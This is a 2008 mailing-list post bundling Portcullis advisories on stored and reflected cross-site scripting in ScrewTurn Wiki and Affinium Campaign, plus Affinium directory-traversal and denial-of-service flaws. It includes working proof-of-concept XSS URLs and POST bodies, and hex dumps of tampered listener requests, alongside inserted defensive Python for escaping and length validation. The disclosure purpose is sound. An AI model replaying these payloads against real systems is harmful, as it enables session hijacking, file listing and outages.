[Full-disclosure] Advisories
- To: <moderators@xxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>, <vuln@xxxxxxxxxxx>, <news@xxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Advisories
- From: "advisories" <advisories@xxxxxxxxxxxxxxxxxxxxxxx>
- Date: Wed, 30 Jul 2008 07:58:16 +0100
Hello
Please find attached advisories to be published.
Kind Regards
Advisories
Portcullis Computer Security Ltd
Portcullis Security Advisory 08_008
Vulnerable System:
ScrewTurn Wiki (www.screwturn.eu).
Vulnerability Title:
Permanent Cross-site Scripting in the "System Log" page.
Vulnerability Discovery And Development:
Portcullis Security Testing Services.
Credit For Discovery:
Ferruh Mavituna - Portcullis Computer-Security Ltd.
Affected systems:
ScrewTurn Wiki 2.0.29 and 2.0.30 confirmed.
Potentially all older versions as well, although this has not been confirmed.
Details:
A request such as the following to any page causes an error to be logged, because
the request is rejected by ASP.NET Request Validation:
http://example.com/?<script>alert('XSS')</script>
The logged error, including the unfiltered request, is then displayed in the
"/admin.aspx - System Log" page.
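The defect pattern here, a logged request rendered to an administrator without output encoding, recurs in the Affinium status log advisory (08-004) further down. As an added example, not code from ScrewTurn or Portcullis, here is a minimal log viewer in Python showing the vulnerable rendering beside an escaped one, plus a triage check that flags log entries carrying markup; the log lines are constructed and only approximate the ASP.NET Request Validation message.

```python
import html
import re

# Constructed log entries modelled on the advisory: ASP.NET Request Validation
# rejects a request whose query string contains markup and the wiki logs the
# rejected value verbatim. The first entry carries the advisory's proof of
# concept; the other two are benign (the third contains a harmless "<").
SAMPLE_LOG = [
    ("2008-07-30 07:58:16", "Error",
     "A potentially dangerous Request.QueryString value was detected from the "
     "client (?<script>alert('XSS')</script>)"),
    ("2008-07-30 08:01:02", "Info", "User admin logged in"),
    ("2008-07-30 08:02:10", "Warning", "Page 'Main' saved with 3 < 5 in body"),
]

# Markup indicators worth a second look in a log: an HTML tag, an inline event
# handler attribute, or a javascript: URL scheme.
MARKUP = re.compile(r"<\s*/?\s*[a-z][^>]*>|on[a-z]+\s*=|javascript\s*:", re.I)


def render_vulnerable(entries):
    """The pattern the advisory describes: log text dropped straight into HTML."""
    rows = [f"<tr><td>{ts}</td><td>{level}</td><td>{msg}</td></tr>"
            for ts, level, msg in entries]
    return "<table>" + "".join(rows) + "</table>"


def render_safe(entries):
    """Same page with every log field HTML-escaped before it reaches the browser."""
    rows = [f"<tr><td>{html.escape(ts)}</td><td>{html.escape(level)}</td>"
            f"<td>{html.escape(msg)}</td></tr>"
            for ts, level, msg in entries]
    return "<table>" + "".join(rows) + "</table>"


def flag_markup(entries):
    """Return the timestamps of log entries that carry markup, for triage."""
    return [ts for ts, _, msg in entries if MARKUP.search(msg)]


def contains_live_script(page):
    """True if a rendered page still contains an unescaped <script> tag."""
    return re.search(r"<script[\s>]", page, re.I) is not None
```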
Impact:
High: it is possible to hijack the admin session, and from the admin panel it is
possible to run .NET code via the plugin feature or to manage the whole
application. The exploit does not require any authentication.
Exploit:
A <script>alert('XSS')</script> request to any page in the application.
Vendor Status:
Vendor contacted, who advised that the vulnerability has been fixed in version
2.0.31.
Copyright:
Copyright © Portcullis Computer Security Limited 2008, All rights reserved
worldwide.
Permission is hereby granted for the electronic redistribution of this
information. It is not to be edited or altered in any way without the express
written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties, implied or otherwise, with regard to this information or its use.
Any use of this information is at the user's risk. In no event shall the
author/distributor (Portcullis Computer Security Limited) be held liable for
any damages whatsoever arising out of or in connection with the use or spread
of this information.
Portcullis Security Advisory - 08-005
Vulnerable System:
Affinium Campaign
Vulnerability Title:
The web application's parameters are vulnerable to reflected JavaScript
injection.
Vulnerability Discovery And Development:
Portcullis Security Testing Services.
Credit For Discovery:
Tim Brown - Portcullis Computer-Security Ltd.
Affected systems:
All known versions of Affinium Campaign; the vulnerability discovered was for
version 7.2.1.0.55.
Details:
It is possible for an attacker to inject JavaScript by manipulating various
parameters such that the JavaScript from the manipulated request is returned in
the response. Example URLs that trigger this behaviour include:
* https://webserver/Campaign/campaignDetails.do?id=%3Cscript%3Ealert('xss')%3C/script%3E
* https://webserver/Campaign/offerDetails.do?id=%3Cscript%3Ealert('xss')%3C/script%3E
* https://webserver/Campaign/Campaign?function=%3Cscript%3Ealert('xss')%3C/script%3E
* https://webserver/Campaign/runAllFlowchart.do?sessionID=%3Cscript%3Ealert(document.cookie)%3C/script%3E
* https://webserver/Campaign/updateOfferTemplatePage.do?actionType=edit&id=%3Cscript%3Ealert('xss')%3C/script%3E
* https://webserver/Campaign/Campaign?function=LoadFrame&Frame=3Cscript%3Ealert('xss')%3C/script%3E
In many of these cases the web application fails when attempting to parse the
JavaScript as an integer. The resulting error page includes details of the
exception thrown, including the malformed input containing the injected
JavaScript.
Of particular concern are the following example URLs which, when requested,
result in the JavaScript being returned in the login page itself:
* https://webserver/manager/jsp/test.jsp?affiniumUserName=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
* https://webserver/Campaign/main.do?affiniumUserName=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
It is worth considering that there may well be other instances where similar
exceptions are raised, and these are also likely to be vulnerable.
Impact:
An attacker would be able to use this to execute malicious code on visitors'
computers.
Exploit:
Exploit code is not required.
Vendor Status:
05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches
Portcullis Security Advisory - 08-001
Vulnerable System:
Affinium Campaign
Vulnerability Title:
The web application's bookmarks web page is vulnerable to a JavaScript
injection.
Vulnerability Discovery And Development:
Portcullis Security Testing Services.
Credit For Discovery:
Tim Brown - Portcullis Computer-Security Ltd.
Affected systems:
All known versions of Affinium Campaign; the vulnerability discovered was for
version 7.2.1.0.55.
Details:
It is possible for an attacker to inject JavaScript into the bookmarks web page
by manipulating the PageName and url parameters of requests to
https://webserver/Campaign/Campaign. For example:
POST /Campaign/Campaign HTTP/1.1
Host: webserver
Cookie: ADMINCONSOLESESSION=HJvLfMGn2KaCJDzcHvv0pbMCldhZNd8vd29g546JL028wcPF08ht!890790959; AMSSESSIONID=HJQKGLYD3jy0BaBckv1G2J1Jh0TJqC8fMp9abvmxG7Ryf0cCJ0Jg!890790959; CAMPAIGNSESSIONID=HJaAjn2Kv99LTaXQ2QZnhNT2nh5VQXSYpSmmf0l1KFLBFnFzVvv5!890790959
Content-Type: application/x-www-form-urlencoded
Content-Length: 169

PageName=" onmouseover="javascript:alert('xss')" name="&url=javascript%3Aalert%28%27xss%27%29&function=CustomBookMarkLink&cmd=add&CustomBookmarkFrame=CustomBookmarkReply
The application accepts javascript: style URLs. In addition, input injected into
the title field is sanitised on the main page but is executed when the bookmark
is edited.
Impact:
An attacker would be able to use this to execute malicious code on visitors'
computers.
Exploit:
Exploit code is not required.
Vendor Status:
05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches
Portcullis Security Advisory - 08-002
Vulnerable System:
Affinium Campaign
Vulnerability Title:
The web application's create a new folder functionality is vulnerable to a
directory traversal.
Vulnerability Discovery And Development:
Portcullis Security Testing Services.
Credit For Discovery:
Neil Kettle and Tim Brown - Portcullis Computer-Security Ltd.
Affected systems:
All known versions of Affinium Campaign; the vulnerability discovered was for
version 7.2.1.0.55.
Details:
It is possible for an attacker to traverse the directory structure and break
out of the application-imposed sandbox by manipulating requests to create a new
folder and altering the folder name to include ../../../../../../../../../,
allowing the creation of directories in locations such as /tmp and /var/tmp.
Furthermore, it was then possible to create files with arbitrary filenames in
those locations.
Impact:
An attacker would be able to use this to create or modify configuration files
in sensitive locations.
Exploit:
Exploit code is not required.
Vendor Status:
05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches
Portcullis Security Advisory - 08-006
Vulnerable System:
Affinium Campaign
Vulnerability Title:
The Listener is vulnerable to directory traversal.
Vulnerability Discovery And Development:
Portcullis Security Testing Services.
Credit For Discovery:
Tim Brown - Portcullis Computer-Security Ltd.
Affected systems:
All known versions of Affinium Campaign; the vulnerability discovered was for
version 7.2.1.0.55.
Details:
It is possible for an attacker to traverse the directory structure and break
out of the application-imposed sandbox by manipulating requests from the web
application's ActiveX control, which encapsulates binary data within an HTTP
POST request to https://webserver/Campaign/CampaignListener. Since the
CampaignListener web page is expecting binary data, no attempt to validate the
input is made prior to passing it to the listener server. For example:
00000000 50 4f 53 54 20 2f 43 61 6d 70 61 69 67 6e 2f 43 |POST /Campaign/C|
00000010 61 6d 70 61 69 67 6e 4c 69 73 74 65 6e 65 72 3f |ampaignListener?|
00000020 43 6c 69 65 6e 74 49 44 3d 31 20 48 54 54 50 2f |ClientID=1 HTTP/|
00000030 31 2e 31 0d 0a 48 6f 73 74 3a 20 77 65 62 73 65 |1.1..Host: webse|
00000040 72 76 65 72 0d 0a 43 6f 6f 6b 69 65 3a 20 55 6e |rver..Cookie: Un|
00000050 69 63 61 44 65 66 61 75 6c 74 43 61 74 61 6c 6f |icaDefaultCatalo|
00000060 67 3d 44 52 5f 54 65 73 74 2e 63 61 74 3b 20 43 |g=DR_Test.cat; C|
00000070 41 4d 50 41 49 47 4e 53 45 53 53 49 4f 4e 49 44 |AMPAIGNSESSIONID|
00000080 3d 48 41 5a 51 74 36 50 6c 6b 56 38 34 4c 62 32 |=HAZQt6PlkV84Lb2|
00000090 70 46 53 37 58 77 4d 6d 62 4c 41 31 76 4d 6e 74 |pFS7XwMmbLA1vMnt|
000000a0 6e 50 38 6d 4c 47 41 68 31 47 79 59 43 76 30 6e |nP8mLGAh1GyYCv0n|
000000b0 44 37 79 6b 34 21 37 30 37 36 33 30 32 33 39 0d |D7yk4!707630239.|
000000c0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a |.Content-Length:|
000000d0 20 32 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 | 229..Content-Ty|
000000e0 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f |pe: multipart/fo|
000000f0 72 6d 2d 64 61 74 61 0d 0a 0d 0a e1 00 00 00 01 |rm-data....á....|
00000100 00 02 07 08 00 00 00 01 01 00 00 00 12 00 00 00 |................|
00000110 0d 01 00 00 00 00 01 01 00 00 00 01 00 00 00 01 |................|
00000120 01 00 00 00 17 00 00 00 12 09 00 00 00 53 46 69 |.............SFi|
00000130 6c 65 53 79 73 00 01 01 00 00 00 01 00 00 00 04 |leSys...........|
00000140 97 00 00 00 00 00 00 00 42 00 00 00 00 00 46 00 |........B.....F.|
00000150 00 00 2f 65 74 63 00 00 00 00 00 00 00 00 00 00 |../etc..........|
00000160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000190 00 00 00 00 00 00 00 00 00 3c 00 00 00 2f 61 70 |.........<.../ap|
000001a0 70 73 2f 75 6e 69 63 61 2f 61 66 66 69 6e 69 75 |ps/unica/affiniu|
000001b0 6d 2f 41 66 66 69 6e 69 75 6d 2f 43 61 6d 70 61 |m/Affinium/Campa|
000001c0 69 67 6e 2f 70 61 72 74 69 74 69 6f 6e 73 2f 70 |ign/partitions/p|
000001d0 61 72 74 69 74 69 6f 6e 31 00 42 00 00 00 00 00 |artition1.B.....|
000001e0 0d 0a |..|
This results in the following being returned:
... snipped for brevity ...
00001200 00 00 01 00 00 00 41 41 06 00 00 00 70 61 73 73 |......AA....pass|
00001210 77 64 00 fb 66 60 c9 14 09 00 00 00 00 00 00 01 |wd.ûf`É.........|
00001220 00 00 00 41 41 04 00 00 00 70 69 6e 67 00 d7 8c |...AA....ping.×.|
00001230 92 c5 82 7d 00 00 00 00 00 00 01 00 00 00 41 41 |.Å.}..........AA|
00001240 0c 00 00 00 70 6f 6c 69 63 79 64 2e 63 6f 6e 66 |....policyd.conf|
00001250 00 8a 46 3a c5 b0 08 00 00 00 00 00 00 01 00 00 |..F:Å°..........|
00001260 00 41 41 0d 00 00 00 70 72 65 73 65 72 76 65 2e |.AA....preserve.|
00001270 6c 69 73 74 00 6f 47 3a c5 c4 04 00 00 00 00 00 |list.oG:ÅÄ......|
00001280 00 01 00 00 00 41 41 07 00 00 00 70 72 6f 66 69 |.....AA....profi|
00001290 6c 65 00 45 c7 d8 c5 d8 0f 00 00 00 00 00 00 01 |le.EÇØÅØ........|
000012a0 00 00 00 41 41 0b 00 00 00 70 72 6f 66 69 6c 65 |...AA....profile|
000012b0 2e 61 77 73 00 6f 6c c4 c5 58 02 00 00 00 00 00 |.aws.olÄÅX......|
000012c0 00 01 00 00 00 41 41 0d 00 00 00 70 72 6f 66 69 |.....AA....profi|
000012d0 6c 65 2e 62 61 6b 75 70 00 0b 6f 44 c5 7f 09 00 |le.bakup..oDÅ...|
000012e0 00 00 00 00 00 01 00 00 00 41 41 0b 00 00 00 70 |.........AA....p|
000012f0 72 6f 66 69 6c 65 2e 75 6e 69 00 5a 71 c4 c5 be |rofile.uni.ZqÄž|
00001300 01 00 00 00 00 00 00 01 00 00 00 41 41 09 00 00 |...........AA...|
00001310 00 70 72 6f 74 6f 63 6f 6c 73 00 8a 46 3a c5 ba |.protocols..F:ź|
00001320 26 00 00 00 00 00 00 01 00 00 00 41 41 08 00 00 |&..........AA...|
00001330 00 70 73 65 2e 63 6f 6e 66 00 df 44 3a c5 fc 0c |.pse.conf.ßD:Åü.|
00001340 00 00 00 00 00 00 01 00 00 00 41 41 0d 00 00 00 |..........AA....|
00001350 70 73 65 5f 74 75 6e 65 2e 63 6f 6e 66 00 df 44 |pse_tune.conf.ßD|
... snipped for brevity ...
Impact:
An attacker would be able to use this to list files in sensitive locations.
Whilst it was not conclusively proven, it may also be possible to map existing
files such as /etc/passwd to Affinium Campaign tables and to execute arbitrary
commands by further manipulation of requests from the ActiveX control to the
CampaignListener web page.
Exploit:
Exploit code is not required.
Vendor Status:
05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches
Portcullis Security Advisory - 08-007
Vulnerable System:
Affinium Campaign
Vulnerability Title:
The listener is vulnerable to Denial of Service.
Vulnerability Discovery And Development:
Portcullis Security Testing Services.
Credit For Discovery:
Neil Kettle and Tim Brown - Portcullis Computer-Security Ltd.
Affected systems:
All known versions of Affinium Campaign; the vulnerability discovered was for
version 7.2.1.0.55.
Details:
Whilst it was not possible to confirm the exact nature of the vulnerability, it
is believed that on connecting to the listener server a four-byte length value
is accepted which is used in calculations relating to memory allocation. By
specifying an invalid value for this, the server fails when allocating or
accessing memory. Note: in reproducing this, connections were spawned which each
sent a four-byte value, incremented on each connection, until the server
crashed.
Similar issues can also be triggered from the web application which is
typically deployed in front of the listener server. In this case the
application makes use of an ActiveX control which encapsulates binary data
within an HTTP POST request to http://webserver/Campaign/CampaignListener.
Since the CampaignListener web page is expecting binary data, no attempt to
validate the input is made prior to passing it to the listener server. It was
identified that length encoding was again used and, as with the direct
connection, manipulation of these length fields could affect memory allocation.
For example, by specifying an invalid two-byte length value, the server can be
made to fail when allocating memory:
00000000 50 4f 53 54 20 2f 43 61 6d 70 61 69 67 6e 2f 43 |POST /Campaign/C|
00000010 61 6d 70 61 69 67 6e 4c 69 73 74 65 6e 65 72 3f |ampaignListener?|
00000020 43 6c 69 65 6e 74 49 44 3d 35 20 48 54 54 50 2f |ClientID=5 HTTP/|
00000030 31 2e 31 0d 0a 48 6f 73 74 3a 20 77 65 62 73 65 |1.1..Host: webse|
00000040 72 76 65 72 0d 0a 43 6f 6f 6b 69 65 3a 20 43 41 |rver..Cookie: CA|
00000050 4d 50 41 49 47 4e 53 45 53 53 49 4f 4e 49 44 3d |MPAIGNSESSIONID=|
00000060 48 56 73 62 47 35 70 6e 44 37 52 6c 79 67 6e 43 |HVsbG5pnD7RlygnC|
00000070 38 64 74 4e 56 50 76 50 43 51 56 57 32 37 78 54 |8dtNVPvPCQVW27xT|
00000080 4c 63 76 79 36 51 57 63 51 51 4c 51 32 51 52 52 |Lcvy6QWcQQLQ2QRR|
00000090 46 56 57 76 21 31 33 36 34 35 35 34 39 33 34 0d |FVWv!1364554934.|
000000a0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a |.Content-Length:|
000000b0 20 32 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 | 296..Content-Ty|
000000c0 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f |pe: multipart/fo|
000000d0 72 6d 2d 64 61 74 61 0d 0a 0d 0a 1f 01 00 00 01 |rm-data.........|
000000e0 00 02 07 0c 00 00 00 01 01 00 00 00 03 00 00 00 |................|
000000f0 12 0c 00 00 00 75 6e 69 63 61 5f 61 63 73 76 72 |.....unica_acsvr|
00000100 00 12 73 00 00 00 2f 61 70 70 73 2f 75 6e 69 63 |..s.../apps/unic|
00000110 61 2f 61 66 66 69 6e 69 75 6d 2f 41 66 66 69 6e |a/affinium/Affin|
00000120 69 75 6d 2f 43 61 6d 70 61 69 67 6e 2f 70 61 72 |ium/Campaign/par|
00000130 74 69 74 69 6f 6e 73 2f 70 61 72 74 69 74 69 6f |titions/partitio|
00000140 6e 31 2f 63 61 6d 70 61 69 67 6e 73 2f 41 41 41 |n1/campaigns/AAA|
00000150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
*
00000170 41 41 41 41 41 41 41 41 00 04 2a 00 00 00 0e f2 |AAAAAAAA..*....ò|
00000180 95 47 51 57 f2 00 00 00 00 00 14 00 00 00 01 29 |.GQWò..........)|
00000190 d5 1b 4f 5f 75 72 f9 00 66 3c 62 8a b8 d6 c3 a6 |Õ.O_urù.f<b.¸Öæ|
000001a0 4f 63 00 00 00 00 00 00 12 0b 00 00 00 70 61 72 |Oc...........par|
000001b0 74 69 74 69 6f 6e 31 00 12 00 00 00 00 12 0e 00 |tition1.........|
000001c0 00 00 31 32 30 31 30 30 37 38 37 31 32 39 38 00 |..1201007871298.|
000001d0 05 01 00 00 00 00 00 00 00 05 01 00 00 00 00 00 |................|
000001e0 00 00 05 01 00 00 00 02 00 00 00 12 03 00 00 00 |................|
000001f0 2d 6c 00 12 06 00 00 00 65 6e 5f 55 53 00 41 41 |-l......en_US.AA|
00000200 d3 4d 00 0d 0a |ÓM...|
The status log included the following lines detailing the Denial of Service:
01/22/2008 13:48:13.220 [E] [MEMORY] SBRK value: 20ab2d50; _end: 200a2974; difference: 10552284 [hmem:2101]
01/22/2008 13:48:13.220 [E] [MEMORY] OUT OF MEMORY: Unable to REALLOCATE 1305706496 bytes. [hmem:2404]
1305706496 can be expressed as 0x4dd38000 in hexadecimal. Once endian and
encoding issues have been accounted for, the top two bytes correspond to our
invalid two-byte length value of 0xd34d (see offset 0x200 in the dump above).
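The length fields in the CampaignListener messages (advisories 08-006, 08-007 and 08-004) are what the listener trusts without checking. As an added example, not code from Unica or Portcullis, here is a Python parser that models the framing as I read it from the dumps (a 4-byte little-endian length prefix that equals Content-Length minus 4 in the untampered dumps, and tag 0x12 string fields with their own 4-byte little-endian length) and validates every declared length against the bytes actually present, so a tampered length is rejected instead of driving an allocation; it also reproduces the 0x4dd38000 to 'd3 4d' derivation from the status log. The tag layout and size limits are my inferences and assumptions, and the samples are constructed.

```python
import struct

# Framing as read from the dumps in advisories 08-006, 08-007 and 08-004 (my own
# reading of the bytes, not a documented format): the POST body opens with a
# 4-byte little-endian length that equals Content-Length minus 4 in the untampered
# dumps (0xe1 = 225 = 229 - 4; 0x11f = 287 = 291 - 4), and string fields appear as
# tag 0x12, a 4-byte little-endian length, then that many bytes ending in NUL
# ("12 0c 00 00 00 unica_acsvr\0"). Non-string tags are not modelled here.
TAG_STRING = 0x12
MAX_MESSAGE = 64 * 1024  # assumed upper bound for one request body
MAX_FIELD = 4096         # assumed upper bound for one string field


def encode_string_field(value: str) -> bytes:
    """Build one tag-0x12 string field in the observed layout."""
    payload = value.encode("ascii") + b"\x00"
    return bytes([TAG_STRING]) + struct.pack("<I", len(payload)) + payload


def frame_message(body: bytes) -> bytes:
    """Prefix a body with the 4-byte little-endian length seen in the dumps."""
    return struct.pack("<I", len(body)) + body


def parse_message(data: bytes) -> list:
    """Parse a framed message, checking every declared length against the
    bytes actually present before using it, so a tampered length yields a
    ValueError rather than an oversized allocation (advisory 08-007)."""
    if len(data) < 4:
        raise ValueError("truncated length prefix")
    (declared,) = struct.unpack_from("<I", data, 0)
    if declared > MAX_MESSAGE:
        raise ValueError(f"declared length {declared} exceeds limit")
    if declared != len(data) - 4:
        raise ValueError(f"declared length {declared} != actual {len(data) - 4}")
    body = data[4:]
    fields, pos = [], 0
    while pos < len(body):
        tag = body[pos]
        pos += 1
        if tag != TAG_STRING:
            raise ValueError(f"unsupported tag 0x{tag:02x} at offset {pos - 1}")
        if pos + 4 > len(body):
            raise ValueError("truncated field length")
        (length,) = struct.unpack_from("<I", body, pos)
        pos += 4
        if length > MAX_FIELD or pos + length > len(body):
            raise ValueError(f"field length {length} at offset {pos - 4} does not fit")
        raw = body[pos:pos + length]
        pos += length
        if not raw.endswith(b"\x00"):
            raise ValueError("string field is not NUL-terminated")
        fields.append(raw[:-1].decode("ascii", errors="replace"))
    return fields


def realloc_size_to_length_bytes(nbytes: int) -> bytes:
    """Recover the two tampered length bytes from the REALLOCATE size in the
    status log: 1305706496 == 0x4dd38000, top two bytes 0x4dd3, which is the
    little-endian reading of 'd3 4d' at offset 0x200 of the dump."""
    return struct.pack("<H", (nbytes >> 16) & 0xFFFF)


def parse_or_error(data: bytes) -> str:
    """Return 'ok' for a well-formed message, else the rejection reason."""
    try:
        parse_message(data)
        return "ok"
    except ValueError as exc:
        return f"rejected: {exc}"


# Constructed sample: the string fields visible in the 08-007 dump, framed with
# the same prefix; the real message also carries non-string fields, omitted here.
GOOD = frame_message(b"".join(encode_string_field(v) for v in [
    "unica_acsvr",
    "/apps/unica/affinium/Affinium/Campaign/partitions/partition1/campaigns/AAAA",
    "partition1", "", "1201007871298", "-l", "en_US",
]))

# Constructed tampered sample: the last field claims 0x4dd3 bytes (the 'd3 4d'
# pair from the advisory) while only the six bytes of "en_US\0" follow it.
TAMPERED = frame_message(
    encode_string_field("unica_acsvr")
    + bytes([TAG_STRING]) + b"\xd3\x4d\x00\x00" + b"en_US\x00"
)
```

A naive reader that allocated 0x4dd3 bytes on the strength of the field header, or that trusted the outer prefix without comparing it to the bytes received, is the behaviour the advisory's out-of-memory log line records.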
Impact:
An attacker would be able to cause a Denial of Service.
Exploit:
Exploit code is not required.
Vendor Status:
05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches
Portcullis Security Advisory - 08-004
Vulnerable System:
Affinium Campaign
Vulnerability Title:
The web application's status log web page is vulnerable to a second-order
JavaScript injection.
Vulnerability Discovery And Development:
Portcullis Security Testing Services.
Credit For Discovery:
Tim Brown - Portcullis Computer-Security Ltd.
Affected systems:
All known versions of Affinium Campaign; the vulnerability discovered was for
version 7.2.1.0.55.
Details:
It is possible for an attacker to inject JavaScript into the web application
which is typically deployed in front of the listener server by manipulating
requests from the web application's ActiveX control which encapsulates binary
data within an HTTP POST request to
https://webserver/Campaign/CampaignListener. The status log contains the
requests made to the CampaignListener web page along with the results of any
such requests. Since the CampaignListener web page is expecting binary data, no
attempt to validate the input is made prior to passing it to the listener
server. When an authenticated administrative user visits the status logs web
page, the JavaScript from the manipulated ActiveX control request is returned
in the response. For example:
00000000 50 4f 53 54 20 2f 43 61 6d 70 61 69 67 6e 2f 43 |POST /Campaign/C|
00000010 61 6d 70 61 69 67 6e 4c 69 73 74 65 6e 65 72 3f |ampaignListener?|
00000020 43 6c 69 65 6e 74 49 44 3d 36 20 48 54 54 50 2f |ClientID=6 HTTP/|
00000030 31 2e 31 0d 0a 48 6f 73 74 3a 20 77 65 62 73 65 |1.1..Host: webse|
00000040 72 76 65 72 0d 0a 43 6f 6f 6b 69 65 3a 20 43 41 |rver..Cookie: CA|
00000050 4d 50 41 49 47 4e 53 45 53 53 49 4f 4e 49 44 3d |MPAIGNSESSIONID=|
00000060 48 57 57 43 54 4c 6d 58 59 54 64 6d 50 6e 68 50 |HWWCTLmXYTdmPnhP|
00000070 41 76 4a 59 54 78 66 54 73 76 41 6e 41 78 68 79 |AvJYTxfTsvAnAxhy|
00000080 54 5a 50 7a 6b 34 6a 43 47 38 47 52 44 51 57 6b |TZPzk4jCG8GRDQWk|
00000090 42 36 6e 5a 21 37 30 37 36 33 30 32 33 39 0d 0a |B6nZ!707630239..|
000000a0 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 |Content-Length: |
000000b0 32 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 |291..Content-Typ|
000000c0 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 |e: multipart/for|
000000d0 6d 2d 64 61 74 61 0d 0a 0d 0a 1f 01 00 00 01 00 |m-data..........|
000000e0 02 07 0c 00 00 00 01 01 00 00 00 03 00 00 00 12 |................|
000000f0 0c 00 00 00 75 6e 69 63 61 5f 61 63 73 76 72 00 |....unica_acsvr.|
00000100 12 73 00 00 00 3c 73 63 72 69 70 74 3e 61 6c 65 |.s...<script>ale|
00000110 72 74 28 27 78 73 73 27 29 3c 2f 73 63 72 69 70 |rt('xss')</scrip|
00000120 74 3e 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |t>AAAAAAAAAAAAAA|
00000130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
*
00000170 41 41 41 41 41 41 41 00 04 2a 00 00 00 0e f2 95 |AAAAAAA..*....ò.|
00000180 47 51 57 f2 00 00 00 00 00 14 00 00 00 01 29 d5 |GQWò..........)Õ|
00000190 1b 4f 5f 75 72 f9 00 66 3c 62 8a b8 d6 c3 a6 4f |.O_urù.f<b.¸ÖæO|
000001a0 63 00 00 00 00 00 00 12 0b 00 00 00 70 61 72 74 |c...........part|
000001b0 69 74 69 6f 6e 31 00 12 00 00 00 00 12 0e 00 00 |ition1..........|
000001c0 00 31 32 30 31 30 30 37 38 37 31 32 39 38 00 05 |.1201007871298..|
000001d0 01 00 00 00 00 00 00 00 05 01 00 00 00 00 00 00 |................|
000001e0 00 05 01 00 00 00 02 00 00 00 12 03 00 00 00 2d |...............-|
000001f0 6c 00 12 06 00 00 00 65 6e 5f 55 53 00 0d 0a |l......en_US...|
Impact:
An attacker would be able to use this to execute malicious code on visitors'
computers.
Exploit:
Exploit code is not required.
Vendor Status:
05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches
Portcullis Security Advisory - 08-003
Vulnerable System:
Affinium Campaign
Vulnerability Title:
The web application's templates web page is vulnerable to a JavaScript
injection.
Vulnerability Discovery And Development:
Portcullis Security Testing Services.
Credit For Discovery:
Tim Brown - Portcullis Computer-Security Ltd.
Affected systems:
All known versions of Affinium Campaign; the vulnerability discovered was for
version 7.2.1.0.55.
Details:
It is possible for an attacker to inject JavaScript into the templates web page
by manipulating the displayIcon parameter of requests to
https://webserver/Campaign/updateOfferTemplateSubmit.do. For example:
POST https://webserver/Campaign/updateOfferTemplateSubmit.do?action=finish HTTP/1.1
Host: webserver
Cookie: CAMPAIGNSESSIONID=HXJBBgzXJdYp1w1klLbQhwycZZ7pQxYyG1af33hRkXtJ1P9CTnMz!707630239
Content-Type: application/x-www-form-urlencoded
Content-Length: 818
createStep=3&offerTemplateID=2&actionType=edit&isInUse=false&offerTemplateName=TemplateName&description=Description&suggestedUsage=SuggestedUsage&displayIcon=%22+onerror%3Djavascript%3Aalert%28%2FXSS%2F%29+onload%3Djavascript%3Aalert%28%2FXSS%2F%29+foo%3D%22&offerCodeCodeFmt1=nnnnnnnnn&offerCodeCodeFmt2=&offerCodeCodeFmt3=&offerCodeCodeFmt4=&offerCodeCodeFmt5=&offerCodeGenerator=uacoffercodegen&treatmentCodeGenerator=++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&treatmentCodeFmt=nnnnnnnnn&offerListSelect=STATIC&offerListSelect=HIDDEN_STATIC&offerListSelect=PARAMETERIZED&policyId=100&updateEnumAttributeID=
The JavaScript from the manipulated request is returned in the response and
executed when the browser tries to load the display icon.
Impact:
An attacker would be able to use this to execute malicious code on visitors'
computers.
Exploit:
Exploit code is not required.
Vendor Status:
05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches